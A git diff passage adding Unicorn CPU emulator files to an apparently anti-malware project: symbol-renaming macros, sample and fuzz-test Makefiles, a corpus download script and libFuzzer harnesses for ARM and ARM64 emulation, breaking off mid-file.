tcg_gen_op2_i32 tcg_gen_op2_i32_x86_64 +#define tcg_gen_op2_i64 tcg_gen_op2_i64_x86_64 +#define tcg_gen_op2i_i32 tcg_gen_op2i_i32_x86_64 +#define tcg_gen_op2i_i64 tcg_gen_op2i_i64_x86_64 +#define tcg_gen_op3_i32 tcg_gen_op3_i32_x86_64 +#define tcg_gen_op3_i64 tcg_gen_op3_i64_x86_64 +#define tcg_gen_op4_i32 tcg_gen_op4_i32_x86_64 +#define tcg_gen_op4i_i32 tcg_gen_op4i_i32_x86_64 +#define tcg_gen_op4ii_i32 tcg_gen_op4ii_i32_x86_64 +#define tcg_gen_op4ii_i64 tcg_gen_op4ii_i64_x86_64 +#define tcg_gen_op5ii_i32 tcg_gen_op5ii_i32_x86_64 +#define tcg_gen_op6_i32 tcg_gen_op6_i32_x86_64 +#define tcg_gen_op6i_i32 tcg_gen_op6i_i32_x86_64 +#define tcg_gen_op6i_i64 tcg_gen_op6i_i64_x86_64 +#define tcg_gen_orc_i32 tcg_gen_orc_i32_x86_64 +#define tcg_gen_or_i32 tcg_gen_or_i32_x86_64 +#define tcg_gen_or_i64 tcg_gen_or_i64_x86_64 +#define tcg_gen_ori_i32 tcg_gen_ori_i32_x86_64 +#define tcg_gen_qemu_ld_i32 tcg_gen_qemu_ld_i32_x86_64 +#define tcg_gen_qemu_ld_i64 tcg_gen_qemu_ld_i64_x86_64 +#define tcg_gen_qemu_st_i32 tcg_gen_qemu_st_i32_x86_64 +#define tcg_gen_qemu_st_i64 tcg_gen_qemu_st_i64_x86_64 +#define tcg_gen_rotl_i32 tcg_gen_rotl_i32_x86_64 +#define tcg_gen_rotli_i32 tcg_gen_rotli_i32_x86_64 +#define tcg_gen_rotr_i32 tcg_gen_rotr_i32_x86_64 +#define tcg_gen_rotri_i32 tcg_gen_rotri_i32_x86_64 +#define tcg_gen_sar_i32 tcg_gen_sar_i32_x86_64 +#define tcg_gen_sari_i32 tcg_gen_sari_i32_x86_64 +#define tcg_gen_setcond_i32 tcg_gen_setcond_i32_x86_64 +#define tcg_gen_shl_i32 tcg_gen_shl_i32_x86_64 +#define tcg_gen_shl_i64 tcg_gen_shl_i64_x86_64 +#define tcg_gen_shli_i32 tcg_gen_shli_i32_x86_64 +#define tcg_gen_shli_i64 tcg_gen_shli_i64_x86_64 +#define tcg_gen_shr_i32 tcg_gen_shr_i32_x86_64 +#define tcg_gen_shifti_i64 tcg_gen_shifti_i64_x86_64 +#define tcg_gen_shr_i64 tcg_gen_shr_i64_x86_64 +#define tcg_gen_shri_i32 tcg_gen_shri_i32_x86_64 +#define tcg_gen_shri_i64 tcg_gen_shri_i64_x86_64 +#define tcg_gen_st_i32 tcg_gen_st_i32_x86_64 +#define tcg_gen_st_i64 tcg_gen_st_i64_x86_64 +#define tcg_gen_sub_i32 tcg_gen_sub_i32_x86_64 +#define tcg_gen_sub_i64 tcg_gen_sub_i64_x86_64 +#define tcg_gen_subi_i32 tcg_gen_subi_i32_x86_64 +#define tcg_gen_trunc_i64_i32 tcg_gen_trunc_i64_i32_x86_64 +#define tcg_gen_trunc_shr_i64_i32 tcg_gen_trunc_shr_i64_i32_x86_64 +#define tcg_gen_xor_i32 tcg_gen_xor_i32_x86_64 +#define tcg_gen_xor_i64 tcg_gen_xor_i64_x86_64 +#define tcg_gen_xori_i32 tcg_gen_xori_i32_x86_64 +#define tcg_get_arg_str_i32 tcg_get_arg_str_i32_x86_64 +#define tcg_get_arg_str_i64 tcg_get_arg_str_i64_x86_64 +#define tcg_get_arg_str_idx tcg_get_arg_str_idx_x86_64 +#define tcg_global_mem_new_i32 tcg_global_mem_new_i32_x86_64 +#define tcg_global_mem_new_i64 tcg_global_mem_new_i64_x86_64 +#define tcg_global_mem_new_internal tcg_global_mem_new_internal_x86_64 +#define tcg_global_reg_new_i32 tcg_global_reg_new_i32_x86_64 +#define tcg_global_reg_new_i64 tcg_global_reg_new_i64_x86_64 +#define tcg_global_reg_new_internal tcg_global_reg_new_internal_x86_64 +#define tcg_handle_interrupt tcg_handle_interrupt_x86_64 +#define tcg_init tcg_init_x86_64 +#define tcg_invert_cond tcg_invert_cond_x86_64 +#define tcg_la_bb_end tcg_la_bb_end_x86_64 +#define tcg_la_br_end tcg_la_br_end_x86_64 +#define tcg_la_func_end tcg_la_func_end_x86_64 +#define tcg_liveness_analysis tcg_liveness_analysis_x86_64 +#define tcg_malloc tcg_malloc_x86_64 +#define tcg_malloc_internal tcg_malloc_internal_x86_64 +#define tcg_op_defs_org tcg_op_defs_org_x86_64 +#define tcg_opt_gen_mov tcg_opt_gen_mov_x86_64 +#define tcg_opt_gen_movi tcg_opt_gen_movi_x86_64 +#define tcg_optimize tcg_optimize_x86_64 +#define tcg_out16 tcg_out16_x86_64 +#define tcg_out32 tcg_out32_x86_64 +#define tcg_out64 tcg_out64_x86_64 +#define tcg_out8 tcg_out8_x86_64 +#define tcg_out_addi tcg_out_addi_x86_64 +#define tcg_out_branch tcg_out_branch_x86_64 +#define tcg_out_brcond32 tcg_out_brcond32_x86_64 +#define tcg_out_brcond64 tcg_out_brcond64_x86_64 +#define tcg_out_bswap32 tcg_out_bswap32_x86_64 +#define tcg_out_bswap64 tcg_out_bswap64_x86_64 +#define tcg_out_call tcg_out_call_x86_64 +#define tcg_out_cmp tcg_out_cmp_x86_64 +#define tcg_out_ext16s tcg_out_ext16s_x86_64 +#define tcg_out_ext16u tcg_out_ext16u_x86_64 +#define tcg_out_ext32s tcg_out_ext32s_x86_64 +#define tcg_out_ext32u tcg_out_ext32u_x86_64 +#define tcg_out_ext8s tcg_out_ext8s_x86_64 +#define tcg_out_ext8u tcg_out_ext8u_x86_64 +#define tcg_out_jmp tcg_out_jmp_x86_64 +#define tcg_out_jxx tcg_out_jxx_x86_64 +#define tcg_out_label tcg_out_label_x86_64 +#define tcg_out_ld tcg_out_ld_x86_64 +#define tcg_out_modrm tcg_out_modrm_x86_64 +#define tcg_out_modrm_offset tcg_out_modrm_offset_x86_64 +#define tcg_out_modrm_sib_offset tcg_out_modrm_sib_offset_x86_64 +#define tcg_out_mov tcg_out_mov_x86_64 +#define tcg_out_movcond32 tcg_out_movcond32_x86_64 +#define tcg_out_movcond64 tcg_out_movcond64_x86_64 +#define tcg_out_movi tcg_out_movi_x86_64 +#define tcg_out_op tcg_out_op_x86_64 +#define tcg_out_pop tcg_out_pop_x86_64 +#define tcg_out_push tcg_out_push_x86_64 +#define tcg_out_qemu_ld tcg_out_qemu_ld_x86_64 +#define tcg_out_qemu_ld_direct tcg_out_qemu_ld_direct_x86_64 +#define tcg_out_qemu_ld_slow_path tcg_out_qemu_ld_slow_path_x86_64 +#define tcg_out_qemu_st tcg_out_qemu_st_x86_64 +#define tcg_out_qemu_st_direct tcg_out_qemu_st_direct_x86_64 +#define tcg_out_qemu_st_slow_path tcg_out_qemu_st_slow_path_x86_64 +#define tcg_out_reloc tcg_out_reloc_x86_64 +#define tcg_out_rolw_8 tcg_out_rolw_8_x86_64 +#define tcg_out_setcond32 tcg_out_setcond32_x86_64 +#define tcg_out_setcond64 tcg_out_setcond64_x86_64 +#define tcg_out_shifti tcg_out_shifti_x86_64 +#define tcg_out_st tcg_out_st_x86_64 +#define tcg_out_tb_finalize tcg_out_tb_finalize_x86_64 +#define tcg_out_tb_init tcg_out_tb_init_x86_64 +#define tcg_out_tlb_load tcg_out_tlb_load_x86_64 +#define tcg_out_vex_modrm tcg_out_vex_modrm_x86_64 +#define tcg_patch32 tcg_patch32_x86_64 +#define tcg_patch8 tcg_patch8_x86_64 +#define tcg_pcrel_diff tcg_pcrel_diff_x86_64 +#define tcg_pool_reset tcg_pool_reset_x86_64 +#define tcg_prologue_init tcg_prologue_init_x86_64 +#define tcg_ptr_byte_diff tcg_ptr_byte_diff_x86_64 +#define tcg_reg_alloc tcg_reg_alloc_x86_64 +#define tcg_reg_alloc_bb_end tcg_reg_alloc_bb_end_x86_64 +#define tcg_reg_alloc_call tcg_reg_alloc_call_x86_64 +#define tcg_reg_alloc_mov tcg_reg_alloc_mov_x86_64 +#define tcg_reg_alloc_movi tcg_reg_alloc_movi_x86_64 +#define tcg_reg_alloc_op tcg_reg_alloc_op_x86_64 +#define tcg_reg_alloc_start tcg_reg_alloc_start_x86_64 +#define tcg_reg_free tcg_reg_free_x86_64 +#define tcg_reg_sync tcg_reg_sync_x86_64 +#define tcg_set_frame tcg_set_frame_x86_64 +#define tcg_set_nop tcg_set_nop_x86_64 +#define tcg_swap_cond tcg_swap_cond_x86_64 +#define tcg_target_callee_save_regs tcg_target_callee_save_regs_x86_64 +#define tcg_target_call_iarg_regs tcg_target_call_iarg_regs_x86_64 +#define tcg_target_call_oarg_regs tcg_target_call_oarg_regs_x86_64 +#define tcg_target_const_match tcg_target_const_match_x86_64 +#define tcg_target_init tcg_target_init_x86_64 +#define tcg_target_qemu_prologue tcg_target_qemu_prologue_x86_64 +#define tcg_target_reg_alloc_order tcg_target_reg_alloc_order_x86_64 +#define tcg_temp_alloc tcg_temp_alloc_x86_64 +#define tcg_temp_free_i32 tcg_temp_free_i32_x86_64 +#define tcg_temp_free_i64 tcg_temp_free_i64_x86_64 +#define tcg_temp_free_internal tcg_temp_free_internal_x86_64 +#define tcg_temp_local_new_i32 tcg_temp_local_new_i32_x86_64 +#define tcg_temp_local_new_i64 tcg_temp_local_new_i64_x86_64 +#define tcg_temp_new_i32 tcg_temp_new_i32_x86_64 +#define tcg_temp_new_i64 tcg_temp_new_i64_x86_64 +#define tcg_temp_new_internal tcg_temp_new_internal_x86_64 +#define tcg_temp_new_internal_i32 tcg_temp_new_internal_i32_x86_64 +#define tcg_temp_new_internal_i64 tcg_temp_new_internal_i64_x86_64 +#define tdb_hash tdb_hash_x86_64 +#define teecr_write teecr_write_x86_64 +#define teehbr_access teehbr_access_x86_64 +#define temp_allocate_frame temp_allocate_frame_x86_64 +#define temp_dead temp_dead_x86_64 +#define temps_are_copies temps_are_copies_x86_64 +#define temp_save temp_save_x86_64 +#define temp_sync temp_sync_x86_64 +#define tgen_arithi tgen_arithi_x86_64 +#define tgen_arithr tgen_arithr_x86_64 +#define thumb2_logic_op thumb2_logic_op_x86_64 +#define ti925t_initfn ti925t_initfn_x86_64 +#define tlb_add_large_page tlb_add_large_page_x86_64 +#define tlb_flush_entry tlb_flush_entry_x86_64 +#define tlbi_aa64_asid_is_write tlbi_aa64_asid_is_write_x86_64 +#define tlbi_aa64_asid_write tlbi_aa64_asid_write_x86_64 +#define tlbi_aa64_vaa_is_write tlbi_aa64_vaa_is_write_x86_64 +#define tlbi_aa64_vaa_write tlbi_aa64_vaa_write_x86_64 +#define tlbi_aa64_va_is_write tlbi_aa64_va_is_write_x86_64 +#define tlbi_aa64_va_write tlbi_aa64_va_write_x86_64 +#define tlbiall_is_write tlbiall_is_write_x86_64 +#define tlbiall_write tlbiall_write_x86_64 +#define tlbiasid_is_write tlbiasid_is_write_x86_64 +#define tlbiasid_write tlbiasid_write_x86_64 +#define tlbimvaa_is_write tlbimvaa_is_write_x86_64 +#define tlbimvaa_write tlbimvaa_write_x86_64 +#define tlbimva_is_write tlbimva_is_write_x86_64 +#define tlbimva_write tlbimva_write_x86_64 +#define tlb_is_dirty_ram tlb_is_dirty_ram_x86_64 +#define tlb_protect_code tlb_protect_code_x86_64 +#define tlb_reset_dirty_range tlb_reset_dirty_range_x86_64 +#define tlb_reset_dirty_range_all tlb_reset_dirty_range_all_x86_64 +#define tlb_set_dirty tlb_set_dirty_x86_64 +#define tlb_set_dirty1 tlb_set_dirty1_x86_64 +#define tlb_unprotect_code_phys tlb_unprotect_code_phys_x86_64 +#define tlb_vaddr_to_host tlb_vaddr_to_host_x86_64 +#define token_get_type token_get_type_x86_64 +#define token_get_value token_get_value_x86_64 +#define token_is_escape token_is_escape_x86_64 +#define token_is_keyword token_is_keyword_x86_64 +#define token_is_operator token_is_operator_x86_64 +#define tokens_append_from_iter tokens_append_from_iter_x86_64 +#define to_qiv to_qiv_x86_64 +#define to_qov to_qov_x86_64 +#define tosa_init tosa_init_x86_64 +#define tosa_machine_init tosa_machine_init_x86_64 +#define tswap32 tswap32_x86_64 +#define tswap64 tswap64_x86_64 +#define type_class_get_size type_class_get_size_x86_64 +#define type_get_by_name type_get_by_name_x86_64 +#define type_get_parent type_get_parent_x86_64 +#define type_has_parent type_has_parent_x86_64 +#define type_initialize type_initialize_x86_64 +#define type_initialize_interface type_initialize_interface_x86_64 +#define type_is_ancestor type_is_ancestor_x86_64 +#define type_new type_new_x86_64 +#define type_object_get_size type_object_get_size_x86_64 +#define type_register_internal type_register_internal_x86_64 +#define type_table_add type_table_add_x86_64 +#define type_table_get type_table_get_x86_64 +#define type_table_lookup type_table_lookup_x86_64 +#define uint16_to_float32 uint16_to_float32_x86_64 +#define uint16_to_float64 uint16_to_float64_x86_64 +#define uint32_to_float32 uint32_to_float32_x86_64 +#define uint32_to_float64 uint32_to_float64_x86_64 +#define uint64_to_float128 uint64_to_float128_x86_64 +#define uint64_to_float32 uint64_to_float32_x86_64 +#define uint64_to_float64 uint64_to_float64_x86_64 +#define unassigned_io_ops unassigned_io_ops_x86_64 +#define unassigned_io_read unassigned_io_read_x86_64 +#define unassigned_io_write unassigned_io_write_x86_64 +#define unassigned_mem_accepts unassigned_mem_accepts_x86_64 +#define unassigned_mem_ops unassigned_mem_ops_x86_64 +#define unassigned_mem_read unassigned_mem_read_x86_64 +#define unassigned_mem_write unassigned_mem_write_x86_64 +#define update_spsel update_spsel_x86_64 +#define v6_cp_reginfo v6_cp_reginfo_x86_64 +#define v6k_cp_reginfo v6k_cp_reginfo_x86_64 +#define v7_cp_reginfo v7_cp_reginfo_x86_64 +#define v7mp_cp_reginfo v7mp_cp_reginfo_x86_64 +#define v7m_pop v7m_pop_x86_64 +#define v7m_push v7m_push_x86_64 +#define v8_cp_reginfo v8_cp_reginfo_x86_64 +#define v8_el2_cp_reginfo v8_el2_cp_reginfo_x86_64 +#define v8_el3_cp_reginfo v8_el3_cp_reginfo_x86_64 +#define v8_el3_no_el2_cp_reginfo v8_el3_no_el2_cp_reginfo_x86_64 +#define vapa_cp_reginfo vapa_cp_reginfo_x86_64 +#define vbar_write vbar_write_x86_64 +#define vfp_exceptbits_from_host vfp_exceptbits_from_host_x86_64 +#define vfp_exceptbits_to_host vfp_exceptbits_to_host_x86_64 +#define vfp_get_fpcr vfp_get_fpcr_x86_64 +#define vfp_get_fpscr vfp_get_fpscr_x86_64 +#define vfp_get_fpsr vfp_get_fpsr_x86_64 +#define vfp_reg_offset vfp_reg_offset_x86_64 +#define vfp_set_fpcr vfp_set_fpcr_x86_64 +#define vfp_set_fpscr vfp_set_fpscr_x86_64 +#define vfp_set_fpsr vfp_set_fpsr_x86_64 +#define visit_end_implicit_struct visit_end_implicit_struct_x86_64 +#define visit_end_list visit_end_list_x86_64 +#define visit_end_struct visit_end_struct_x86_64 +#define visit_end_union visit_end_union_x86_64 +#define visit_get_next_type visit_get_next_type_x86_64 +#define visit_next_list visit_next_list_x86_64 +#define visit_optional visit_optional_x86_64 +#define visit_start_implicit_struct visit_start_implicit_struct_x86_64 +#define visit_start_list visit_start_list_x86_64 +#define visit_start_struct visit_start_struct_x86_64 +#define visit_start_union visit_start_union_x86_64 +#define vmsa_cp_reginfo vmsa_cp_reginfo_x86_64 +#define vmsa_tcr_el1_write vmsa_tcr_el1_write_x86_64 +#define vmsa_ttbcr_raw_write vmsa_ttbcr_raw_write_x86_64 +#define vmsa_ttbcr_reset vmsa_ttbcr_reset_x86_64 +#define vmsa_ttbcr_write vmsa_ttbcr_write_x86_64 +#define vmsa_ttbr_write vmsa_ttbr_write_x86_64 +#define write_cpustate_to_list write_cpustate_to_list_x86_64 +#define write_list_to_cpustate write_list_to_cpustate_x86_64 +#define write_raw_cp_reg write_raw_cp_reg_x86_64 +#define X86CPURegister32_lookup X86CPURegister32_lookup_x86_64 +#define x86_op_defs x86_op_defs_x86_64 +#define xpsr_read xpsr_read_x86_64 +#define xpsr_write xpsr_write_x86_64 +#define xscale_cpar_write xscale_cpar_write_x86_64 +#define xscale_cp_reginfo xscale_cp_reginfo_x86_64 +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/samples/.gitignore b/ai_anti_malware/unicorn/unicorn-master/samples/.gitignore new file mode 100644 index 0000000..f53a0ab --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/samples/.gitignore @@ -0,0 +1,5 @@ +!*.c +sample_* +shellcode* +mem_apis* + diff --git a/ai_anti_malware/unicorn/unicorn-master/samples/Makefile b/ai_anti_malware/unicorn/unicorn-master/samples/Makefile new file mode 100644 index 0000000..5b4b28d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/samples/Makefile @@ -0,0 +1,155 @@ +# Unicorn Engine +# By Nguyen Anh Quynh , 2015 + +include ../config.mk + +UNAME_S := $(shell uname -s) + +LIBDIR = .. +BIN_EXT = +AR_EXT = a + +# Verbose output? +V ?= 0 + +CFLAGS += -Wall -Werror -I../include + +LDFLAGS += -L$(LIBDIR) -lunicorn -lpthread -lm +ifeq ($(UNAME_S), Linux) +LDFLAGS += -lrt +endif + +LDLIBS += -lpthread -lunicorn -lm + +ifneq ($(CROSS),) +CC = $(CROSS)gcc +endif + +ifeq ($(UNICORN_ASAN),yes) +CC = clang +CXX = clang++ +AR = llvm-ar +CFLAGS += -fsanitize=address -fno-omit-frame-pointer +LDFLAGS := -fsanitize=address ${LDFLAGS} +endif + +# Cygwin? +ifneq ($(filter CYGWIN%,$(UNAME_S)),) +CFLAGS := $(CFLAGS:-fPIC=) +LDLIBS += -lssp +BIN_EXT = .exe +AR_EXT = a +# mingw? +else ifneq ($(filter MINGW%,$(UNAME_S)),) +CFLAGS := $(CFLAGS:-fPIC=) +BIN_EXT = .exe +AR_EXT = a +endif + +ifeq ($(UNICORN_STATIC),yes) +ifneq ($(filter MINGW%,$(UNAME_S)),) +ARCHIVE = $(LIBDIR)/unicorn.$(AR_EXT) +else ifneq ($(filter CYGWIN%,$(UNAME_S)),) +ARCHIVE = $(LIBDIR)/libunicorn.$(AR_EXT) +else +ARCHIVE = $(LIBDIR)/libunicorn.$(AR_EXT) +endif +endif + +.PHONY: all clean + +UNICORN_ARCHS := $(shell if [ -e ../config.log ]; then cat ../config.log;\ + else printf "$(UNICORN_ARCHS)"; fi) + +SOURCES = +ifneq (,$(findstring arm,$(UNICORN_ARCHS))) +SOURCES += sample_arm.c +SOURCES += sample_armeb.c +endif +ifneq (,$(findstring aarch64,$(UNICORN_ARCHS))) +SOURCES += sample_arm64.c +SOURCES += sample_arm64eb.c +endif +ifneq (,$(findstring mips,$(UNICORN_ARCHS))) +SOURCES += sample_mips.c +endif +#ifneq (,$(findstring ppc,$(UNICORN_ARCHS))) +#SOURCES += sample_ppc.c +#endif +ifneq (,$(findstring sparc,$(UNICORN_ARCHS))) +SOURCES += sample_sparc.c +endif +ifneq (,$(findstring x86,$(UNICORN_ARCHS))) +SOURCES += sample_x86.c +SOURCES += shellcode.c +SOURCES += mem_apis.c +SOURCES += sample_x86_32_gdt_and_seg_regs.c +SOURCES += sample_batch_reg.c +endif +ifneq (,$(findstring m68k,$(UNICORN_ARCHS))) +SOURCES += sample_m68k.c +endif + +BINS = $(SOURCES:.c=$(BIN_EXT)) +OBJS = $(SOURCES:.c=.o) + +all: $(BINS) + +$(BINS): $(OBJS) + +clean: + rm -rf *.o $(BINS) + +%$(BIN_EXT): %.o + @mkdir -p $(@D) +ifeq ($(V),0) +ifeq ($(UNICORN_SHARED),yes) + $(call log,LINK,$(notdir $@)) + @$(link-dynamic) +endif +ifeq ($(UNICORN_STATIC),yes) +ifneq ($(filter MINGW%,$(UNAME_S)),) + $(call log,LINK,$(notdir $(call staticname,$@))) + @$(link-static) +endif +endif +else +ifeq ($(UNICORN_SHARED),yes) + $(link-dynamic) +endif +ifeq ($(UNICORN_STATIC),yes) +ifneq ($(filter MINGW%,$(UNAME_S)),) + $(link-static) +endif +endif +endif + +%.o: %.c + @mkdir -p $(@D) +ifeq ($(V),0) + $(call log,CC,$(@:%=%)) + @$(compile) +else + $(compile) +endif + + +define link-dynamic + $(CC) $< ${CFLAGS} $(LDFLAGS) -o $@ +endef + + +define link-static + $(CC) $< $(ARCHIVE) ${CFLAGS} $(LDFLAGS) -o $(call staticname,$@) +endef + + +staticname = $(subst $(BIN_EXT),,$(1)).static$(BIN_EXT) + +define log + @printf " %-7s %s\n" "$(1)" "$(2)" +endef + +define compile + ${CC} ${CFLAGS} -c $< -o $@ +endef diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/Makefile b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/Makefile new file mode 100644 index 0000000..c0b6946 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/Makefile @@ -0,0 +1,23 @@ +CFLAGS += -L ../../ -I ../../include + +UNAME_S := $(shell uname -s) +LDFLAGS += -pthread +ifeq ($(UNAME_S), Linux) +LDFLAGS += -lrt +endif + +LDFLAGS += ../../libunicorn.a + + +ALL_TESTS_SOURCES = $(wildcard fuzz*.c) +ALL_TESTS = $(ALL_TESTS_SOURCES:%.c=%) + +.PHONY: all +all: ${ALL_TESTS} + +.PHONY: clean +clean: + rm -rf ${ALL_TESTS} + +fuzz%: fuzz%.c + $(CC) $(CFLAGS) $^ onedir.c $(LDFLAGS) -o $@ diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/dlcorpus.sh b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/dlcorpus.sh new file mode 100644 index 0000000..f159e80 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/dlcorpus.sh @@ -0,0 +1,11 @@ +#/bin/sh +#change to script directory +cd `dirname $0` +ls fuzz_emu*.c | sed 's/.c//' | while read target +do + #download public corpus + wget "https://storage.googleapis.com/unicorn-backup.clusterfuzz-external.appspot.com/corpus/libFuzzer/unicorn_$target/public.zip" + unzip -q public.zip -d corpus_$target + #run target on corpus + ./$target corpus_$target +done diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu.options b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu.options new file mode 100644 index 0000000..9fda93f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu.options @@ -0,0 +1,2 @@ +[libfuzzer] +max_len = 4096 diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_arm64_arm.c b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_arm64_arm.c new file mode 100644 index 0000000..9e694e8 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_arm64_arm.c @@ -0,0 +1,56 @@ +#include + + +// memory address where emulation starts +#define ADDRESS 0x1000000 + +uc_engine *uc; +int initialized = 0; +FILE * outfile = NULL; + + +int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { + uc_err err; + + if (initialized == 0) { + if (outfile == NULL) { + // we compute the output + outfile = fopen("/dev/null", "w"); + if (outfile == NULL) { + printf("failed opening /dev/null\n"); + abort(); + return 0; + } + } + + initialized = 1; + } + + // Not global as we must reset this structure + // Initialize emulator in supplied mode + err = uc_open(UC_ARCH_ARM64, UC_MODE_ARM, &uc); + if (err != UC_ERR_OK) { + printf("Failed on uc_open() with error returned: %u\n", err); + abort(); + } + + // map 4MB memory for this emulation + uc_mem_map(uc, ADDRESS, 4 * 1024 * 1024, UC_PROT_ALL); + + // write machine code to be emulated to memory + if (uc_mem_write(uc, ADDRESS, Data, Size)) { + printf("Failed to write emulation code to memory, quit!\n"); + abort(); + } + + // emulate code in infinite time & 4096 instructions + // avoid timeouts with infinite loops + err=uc_emu_start(uc, ADDRESS, ADDRESS + Size, 0, 0x1000); + if (err) { + fprintf(outfile, "Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); + } + + uc_close(uc); + + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_arm64_armbe.c b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_arm64_armbe.c new file mode 100644 index 0000000..716bf86 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_arm64_armbe.c @@ -0,0 +1,56 @@ +#include + + +// memory address where emulation starts +#define ADDRESS 0x1000000 + +uc_engine *uc; +int initialized = 0; +FILE * outfile = NULL; + + +int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { + uc_err err; + + if (initialized == 0) { + if (outfile == NULL) { + // we compute the output + outfile = fopen("/dev/null", "w"); + if (outfile == NULL) { + printf("failed opening /dev/null\n"); + abort(); + return 0; + } + } + + initialized = 1; + } + + // Not global as we must reset this structure + // Initialize emulator in supplied mode + err = uc_open(UC_ARCH_ARM64, UC_MODE_ARM + UC_MODE_BIG_ENDIAN, &uc); + if (err != UC_ERR_OK) { + printf("Failed on uc_open() with error returned: %u\n", err); + abort(); + } + + // map 4MB memory for this emulation + uc_mem_map(uc, ADDRESS, 4 * 1024 * 1024, UC_PROT_ALL); + + // write machine code to be emulated to memory + if (uc_mem_write(uc, ADDRESS, Data, Size)) { + printf("Failed to write emulation code to memory, quit!\n"); + abort(); + } + + // emulate code in infinite time & 4096 instructions + // avoid timeouts with infinite loops + err=uc_emu_start(uc, ADDRESS, ADDRESS + Size, 0, 0x1000); + if (err) { + fprintf(outfile, "Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); + } + + uc_close(uc); + + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_arm_arm.c b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_arm_arm.c new file mode 100644 index 0000000..ca39317 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_arm_arm.c @@ -0,0 +1,56 @@ +#include + + +// memory address where emulation starts +#define ADDRESS 0x1000000 + +uc_engine *uc; +int initialized = 0; +FILE * outfile = NULL; + + +int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { + uc_err err; + + if (initialized == 0) { + if (outfile == NULL) { + // we compute the output + outfile = fopen("/dev/null", "w"); + if (outfile == NULL) { + printf("failed opening /dev/null\n"); + abort(); + return 0; + } + } + + initialized = 1; + } + + // Not global as we must reset this structure + // Initialize emulator in supplied mode + err = uc_open(UC_ARCH_ARM, UC_MODE_ARM, &uc); + if (err != UC_ERR_OK) { + printf("Failed on uc_open() with error returned: %u\n", err); + abort(); + } + + // map 4MB memory for this emulation + uc_mem_map(uc, ADDRESS, 4 * 1024 * 1024, UC_PROT_ALL); + + // write machine code to be emulated to memory + if (uc_mem_write(uc, ADDRESS, Data, Size)) { + printf("Failed to write emulation code to memory, quit!\n"); + abort(); + } + + // emulate code in infinite time & 4096 instructions + // avoid timeouts with infinite loops + err=uc_emu_start(uc, ADDRESS, ADDRESS + Size, 0, 0x1000); + if (err) { + fprintf(outfile, "Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); + } + + uc_close(uc); + + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_arm_armbe.c b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_arm_armbe.c new file mode 100644 index 0000000..aadd385 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_arm_armbe.c @@ -0,0 +1,56 @@ +#include + + +// memory address where emulation starts +#define ADDRESS 0x1000000 + +uc_engine *uc; +int initialized = 0; +FILE * outfile = NULL; + + +int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { + uc_err err; + + if (initialized == 0) { + if (outfile == NULL) { + // we compute the output + outfile = fopen("/dev/null", "w"); + if (outfile == NULL) { + printf("failed opening /dev/null\n"); + abort(); + return 0; + } + } + + initialized = 1; + } + + // Not global as we must reset this structure + // Initialize emulator in supplied mode + err = uc_open(UC_ARCH_ARM, UC_MODE_ARM + UC_MODE_BIG_ENDIAN, &uc); + if (err != UC_ERR_OK) { + printf("Failed on uc_open() with error returned: %u\n", err); + abort(); + } + + // map 4MB memory for this emulation + uc_mem_map(uc, ADDRESS, 4 * 1024 * 1024, UC_PROT_ALL); + + // write machine code to be emulated to memory + if (uc_mem_write(uc, ADDRESS, Data, Size)) { + printf("Failed to write emulation code to memory, quit!\n"); + abort(); + } + + // emulate code in infinite time & 4096 instructions + // avoid timeouts with infinite loops + err=uc_emu_start(uc, ADDRESS, ADDRESS + Size, 0, 0x1000); + if (err) { + fprintf(outfile, "Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); + } + + uc_close(uc); + + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_arm_thumb.c b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_arm_thumb.c new file mode 100644 index 0000000..d50dd6a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_arm_thumb.c @@ -0,0 +1,56 @@ +#include + + +// memory address where emulation starts +#define ADDRESS 0x1000000 + +uc_engine *uc; +int initialized = 0; +FILE * outfile = NULL; + + +int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { + uc_err err; + + if (initialized == 0) { + if (outfile == NULL) { + // we compute the output + outfile = fopen("/dev/null", "w"); + if (outfile == NULL) { + printf("failed opening /dev/null\n"); + abort(); + return 0; + } + } + + initialized = 1; + } + + // Not global as we must reset this structure + // Initialize emulator in supplied mode + err = 